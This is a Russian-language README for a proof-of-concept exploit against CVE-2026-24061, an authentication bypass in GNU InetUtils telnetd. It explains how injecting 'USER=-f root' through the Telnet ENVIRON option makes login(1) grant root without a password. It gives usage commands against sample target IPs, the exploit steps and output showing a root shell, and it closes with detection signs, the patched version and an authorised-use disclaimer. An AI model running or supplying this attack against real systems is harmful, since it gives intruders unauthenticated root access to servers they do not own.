
Эксплойт PoC для CVE-2026-24061 — обход аутентификации через внедрение аргументов в GNU InetUtils telnetd
GNU InetUtils версии с 1.9.3 по 2.7 уязвимы для удалённого обхода аутентификации в сервере telnetd. Демон telnetd не выполняет надлежащую санитизацию переменной окружения USER перед передачей её в качестве аргумента командной строки программе login(1). Когда telnet-клиент отправляет переменную окружения USER, содержащую флаги командной строки (например, -f root), telnetd напрямую передаёт это несанитизированное значение программе login. Утилита login интерпретирует флаг -f как инструкцию для обхода аутентификации, позволяя атакующему получить несанкционированный root-доступ без ввода каких-либо учётных данных.
Полная реализация Telnet-протокола
DO, DONT, WILL и WONT.Автоматическая инъекция полезной нагрузки
ENVIRON с инъекцией USER=-f root.Интерактивная оболочка
Управление соединением
Подробная отладка
python3 exploit.py <target> -p <port> [options]
| Аргумент | Описание |
|---|---|
target | IP-адрес или имя хоста цели |
| Опция | Описание |
|---|---|
-p, --port | Порт цели (по умолчанию: 23) |
-v, --verbose | Включить подробный вывод отладочной информации |
-t, --timeout | Тайм-аут соединения в секундах (по умолчанию: 5) |
-k, --keepalive | Интервал keepalive в секундах (по умолчанию: 30) |
-h, --help | Показать справочное сообщение |
python3 exploit.py 192.168.1.100
python3 exploit.py 192.168.1.100 -p 2323 -v
python3 exploit.py 10.0.0.5 -p 2323 -k 60 -t 10
Установление соединения
Согласование протокола
SGA, ECHO и ENVIRON).Доставка полезной нагрузки
WILL ENVIRON с последующей сконструированной полезной нагрузкой субсогласования.Обход аутентификации
-f root инъецируется в login(1) для обхода проверки учётных данных.Интерактивная сессия
Эксплойт использует Telnet-опцию ENVIRON (RFC 1572) для инъекции аргументов командной строки в переменную окружения USER.
Когда telnetd передаёт это несанитизированное значение в login -f root, программа login интерпретирует -f как флаг, принудительно выполняющий обход аутентификации, предоставляя root-доступ без проверки пароля.
Скрипт эксплойта реализует:
WILL, WONT, DO, DONT)NOP для поддержания стабильности сессии$ python3 exploit.py 127.0.0.1 -p 2323
[!] Coded By: K3ysTr0K3R
[*] Telnet Authentication Bypass
[*] Connecting to 127.0.0.1:2323
[+] Connection established
[+] Exploit payload sent (19 bytes)
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
#
Системные администраторы могут обнаружить попытки эксплуатации, отслеживая:
ENVIRON.USER, содержащие -f или другие флаги командной строки.Обновитесь до версии GNU InetUtils 2.8 или примените официальный патч безопасности, который выполняет санитизацию переменных окружения перед передачей их в login(1).
Эта proof of concept предназначена только для исследований в области безопасности, проверки уязвимостей и авторизованных тестовых сред. Используйте только против систем, для которых у вас есть явное разрешение на проведение оценки безопасности.